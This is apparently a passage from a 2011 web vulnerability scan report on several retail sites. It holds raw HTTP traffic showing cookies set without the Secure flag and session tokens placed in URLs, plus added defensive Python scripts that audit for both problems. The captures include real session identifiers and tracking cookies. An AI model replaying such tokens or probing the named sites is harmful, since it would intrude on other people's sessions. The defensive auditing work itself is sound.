X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:18 GMT
Content-Length: 923

<script type="text/javascript">
       $(document).ready(function() {
           // Drop Down Banners with parameters for: banner div, cookie name, delay before appearing (in seconds), delay before disappearing (i
...[SNIP]...
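The check behind instances 9.10 to 9.19 is a parse of each Set-Cookie header followed by a look at what the cookie is for. The script below is an added example (not scanner code, and not code from any of the sites listed) that does both: it parses raw Set-Cookie values, treats a cookie that is being cleared (empty value, or Expires at or before the response's own Date header) as nothing to protect, and ranks a session-looking name above a tracking or load-balancer cookie. The session-name heuristic and the HttpOnly check are assumptions added here beyond what the report checks; the sample headers are copied from the responses in this section.

```python
"""Audit Set-Cookie headers for the Secure attribute.

Added example for instances 9.10-9.19; not scanner code and not code
from any site in the report. The SESSION_NAME_RE heuristic and the
HttpOnly check are assumptions made here.
"""
import re
from dataclasses import dataclass
from datetime import timezone
from email.utils import parsedate_to_datetime

# Assumed heuristic: names that commonly carry a session identifier.
SESSION_NAME_RE = re.compile(r"sess|^sid$|phpsessid|token", re.IGNORECASE)


@dataclass
class CookieFinding:
    name: str
    missing: list        # attributes absent, e.g. ["Secure", "HttpOnly"]
    deleting: bool       # cookie is being cleared, so nothing to protect
    session_like: bool   # name suggests a session token
    rating: str          # "ok", "information" or "review"


def parse_set_cookie(header: str):
    """Split one Set-Cookie value into (name, value, {attr: value or True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def parse_http_date(text):
    """RFC 1123 or the older DD-Mon-YYYY form, as UTC; None if unparseable."""
    try:
        parsed = parsedate_to_datetime(text)
    except (TypeError, ValueError):
        return None
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed


def audit_set_cookies(headers, response_date, https=True):
    """Return one CookieFinding per Set-Cookie header.

    Expiry is judged against the response's own Date header rather than
    the wall clock, so an old capture such as this report still
    classifies correctly.
    """
    as_of = parse_http_date(response_date)
    findings = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        missing = []
        if https and "secure" not in attrs:
            missing.append("Secure")
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        expires = attrs.get("expires")
        expiry = parse_http_date(expires) if isinstance(expires, str) else None
        deleting = value in ("", '""') or (
            expiry is not None and as_of is not None and expiry <= as_of
        )
        session_like = bool(SESSION_NAME_RE.search(name))
        if not missing or deleting:
            rating = "ok"
        elif session_like:
            rating = "review"
        else:
            rating = "information"
        findings.append(CookieFinding(name, missing, deleting, session_like, rating))
    return findings


# Constructed sample: Set-Cookie values copied from responses in this
# section (bluenile 9.12, ftd 9.10, brookstone 9.13).
SAMPLE_DATE = "Mon, 16 May 2011 02:06:37 GMT"
SAMPLE_HEADERS = [
    "JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure",
    "bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/",
    'SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/',
    "track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com",
    "TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/",
]

if __name__ == "__main__":
    for f in audit_set_cookies(SAMPLE_HEADERS, SAMPLE_DATE):
        print(f"{f.name:12} {f.rating:12} missing={f.missing} deleting={f.deleting}")
```

On the sample, the cleared SID comes out as nothing to act on, bnses, track_id and TS657dfa come out as informational (the scanner's own verdict above), and JSESSIONID, which does carry Secure, is the one still worth a look because it lacks HttpOnly.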

10. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
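The instances of this issue that follow come in two forms, a token in the query string and a servlet-style ;jsessionid= path parameter, and one of them (token=ACE in 10.3) is a short constant rather than a session identifier. The script below is an added example (not scanner code, and not code from any of the sites listed) that reproduces the check on request URLs and on the links in a response body, and grades each hit by the shape of its value so that such constants are reported as tentative. The parameter-name list and the length rule are assumptions made here; the sample URLs and HTML are copied from the instances in this section.

```python
"""Find session tokens carried in URLs.

Added example for the "Session token in URL" issue; not scanner code
and not code from any site in the report. TOKEN_NAME_RE and the
16-character rule in looks_like_token are assumptions made here.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Assumed heuristic: parameter names that usually carry a session id.
TOKEN_NAME_RE = re.compile(r"sess|^sid$|token|phpsessid", re.IGNORECASE)
# Servlet path parameter, e.g. /login.jsp;jsessionid=ABC
PATH_PARAM_RE = re.compile(r";([^;=/?#]+)=([^;/?#]*)")


def looks_like_token(value: str) -> bool:
    """Session identifiers are long and contain digits; 'ACE' is neither."""
    core = re.sub(r"[^A-Za-z0-9]", "", value)
    return len(core) >= 16 and any(ch.isdigit() for ch in core)


def _confidence(value: str) -> str:
    return "firm" if looks_like_token(value) else "tentative"


def find_url_tokens(url: str):
    """Return [(where, name, value, confidence)] for token-like parameters."""
    parts = urlsplit(url)
    hits = []
    # urlsplit leaves ";name=value" path parameters inside .path
    for name, value in PATH_PARAM_RE.findall(parts.path):
        if TOKEN_NAME_RE.search(name):
            hits.append(("path", name, value, _confidence(value)))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if TOKEN_NAME_RE.search(name):
            hits.append(("query", name, value, _confidence(value)))
    return hits


class _HrefCollector(HTMLParser):
    """Collect every <a href> in a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for key, val in attrs:
                if key == "href" and val:
                    self.hrefs.append(val)


def find_html_tokens(html: str):
    """Return [(href, where, name, value, confidence)] for links in a body."""
    collector = _HrefCollector()
    collector.feed(html)
    return [(href,) + hit for href in collector.hrefs for hit in find_url_tokens(href)]


# Constructed sample: request URLs and a body excerpt copied from
# instances 10.1-10.5 of this report.
SAMPLE_URLS = [
    "http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxCount=1&mbox=GC_hp_events",
    "http://t.p.mybuys.com/webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h",
    "http://www.acehardware.com/storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30",
    "http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4",
]
SAMPLE_HTML = """
Welcome to Bluefly, <a title="login" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">login</a>
<li id="navCS"><a href="/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129">Customer Service</a>
<a href="/help.jsp">Help</a>
"""

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url.split("?")[0], find_url_tokens(url))
    for hit in find_html_tokens(SAMPLE_HTML):
        print(hit)
```

A tentative hit such as token=ACE is a prompt for a manual look, not a finding. On the server side, the ;jsessionid= rewriting seen in 10.4 and 10.5 is switched off on Servlet 3.0 and later containers with <session-config><tracking-mode>COOKIE</tracking-mode></session-config> in web.xml; the JBoss 4.x builds named in the X-Powered-By headers of those responses advertise Servlet 2.4 and predate that option, so there the fix is whatever URL-rewriting switch that container version offers.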


10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string (mboxSession in the request below).

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

10.2. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string (sessionId in the request below). Its value is the same one the ftd.com requests above carry in the mbcs cookie, so the visitor's identifier is being passed to this third-party host in a URL.

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

10.3. http://www.acehardware.com/storeLocServ

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.acehardware.com
Path:   /storeLocServ

Issue detail

The URL in the request appears to contain a session token within the query string (token in the request below). This is almost certainly a false positive: the value is the three-character constant ACE, the retailer's own name, sent to a store-locator endpoint alongside latitude, longitude and radius, while the actual session identifier travels in the JSESSIONID cookie.

Request

GET /storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=44.5&lon=-72.646&time=1305510862342 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
X-Prototype-Version: 1.4.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510830898}; __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305510836971%7C1308102836971%3B%20gpv_p27%3DHome%2520Page%7C1305512636976%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1305510861947

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/x-json
Content-Length: 33

{ "RESULTS" : []
,
"COUNT" : 12}

10.4. http://www.bluefly.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens: the /myfly/login.jsp, /custom/custom.jsp and /cart/cart.jsp links in the body excerpt below carry the servlet session id as a ;jsessionid= path parameter. The same value is issued in this response as the JSESSIONID cookie and, with an expiry in 2079, as CS_TRACKER_ID. Servlet containers rewrite links this way on the first response of a session, before they know whether the client accepts cookies.

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...



Welcome to Bluefly, <a title="login" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">login</a> or register
<a title="register" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">here</a>
...[SNIP]...
<li id="navCS"><a href="/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129">Customer Service</a>
...[SNIP]...
<div id="navShopBag">
<a title="shopping bag" href="/cart/cart.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">
<span id="textShopBag">
...[SNIP]...

10.5. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter (the form produced by servlet URL rewriting) rather than in the query string. Its value matches the JSESSIONID and CS_TRACKER_ID cookies sent in the same request, and the tokenised path is additionally echoed into the hr field of the cmRS analytics cookie, so the identifier is being stored and transmitted in several places beyond the session cookie itself:

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

10.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string. Caveat: the parameters visible here (api_key, app_id, the xd_proxy.php callback URLs with their cb and frame identifiers, and session_version=3) are Facebook JavaScript SDK cross-domain messaging parameters, not a bearer session credential, and the response is a bare 302 that sets no cookie. Treat this entry as a probable false positive of the token-in-URL heuristic unless one of these values is shown to grant access to an authenticated session:

Request

GET /extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3c396bb9&origin=http%3A%2F%2Fwww.bluenile.com%2Ff315278f74&relation=parent&transport=postmessage&frame=fc3c3701
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.67
X-Cnection: close
Date: Mon, 16 May 2011 01:55:47 GMT
Content-Length: 0


10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif

Summary

Severity:   Medium
Confidence:   Firm